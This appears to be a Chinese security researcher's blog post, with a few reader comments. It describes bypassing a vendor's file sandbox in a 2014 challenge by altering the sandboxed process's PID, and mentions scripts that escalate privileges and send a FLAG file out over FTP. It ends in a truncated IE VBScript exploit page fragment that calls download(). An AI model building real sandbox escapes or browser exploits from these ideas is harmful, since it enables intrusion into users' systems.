Hello World!
如何轻松bypass文件沙箱 yuange 14年xp挑战赛的时候,某公司防护由于有文件沙箱,外面也认为要破掉比较困难。在挑战前防护组的有人就到处挑衅,因为我知道其实要破这些很简单,就和老齐说了不要去挑事,事后你再怎么得瑟也行,某人才收敛了。 以前大学时候经常玩破解,而破解就是一种比较强的对抗,很多对抗措施,加密系统就经常hook系统,拦截一些底层的调用,还经常检测对抗解密措施。常规的破解办法就是找到分析hook的地方,找到系统更底层的调用入口,然后去调用饶过,两者就是玩逆向玩拼对系统的了解程度。一般对抗的时候,还加入了调试对抗,所以常规手段要短时间去分析饶过这文件沙箱还是确实有一定的难度。 因为对这些对抗很熟悉,我没有分析某沙箱,其实很简单的就能够想到这些沙箱原理,保存沙箱进程的标识,hook一些关键调用,hook里检测是在沙箱进程然后就做安全检测,通过就放行没通过就拒绝。以我二十来年前的总结“安全是一个条件语句”,很简单的想到这个沙箱进程的标识一般会是PID,所以当时就给防护组发了邮件,说了修改PID过沙箱的办法,防护组很快回邮件说修补好了,真的没想到我们各种建议各种防护措施提供各种利用给防护组,防护组纯粹就是欺骗领导。 DVE里的上传提权过文件沙箱再拷贝FLAG文件FTP传回来的脚本,别的情况下很复杂的,DVE的思路下都是几句脚本就实现。 <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <head> </head> <body> <SCRIPT LANGUAGE="VBScript"> On Error Resume Next download() setTimeout
hello yuange
回复删除wordpress 😝
回复删除坐等更新
回复删除hello... from weibo.
回复删除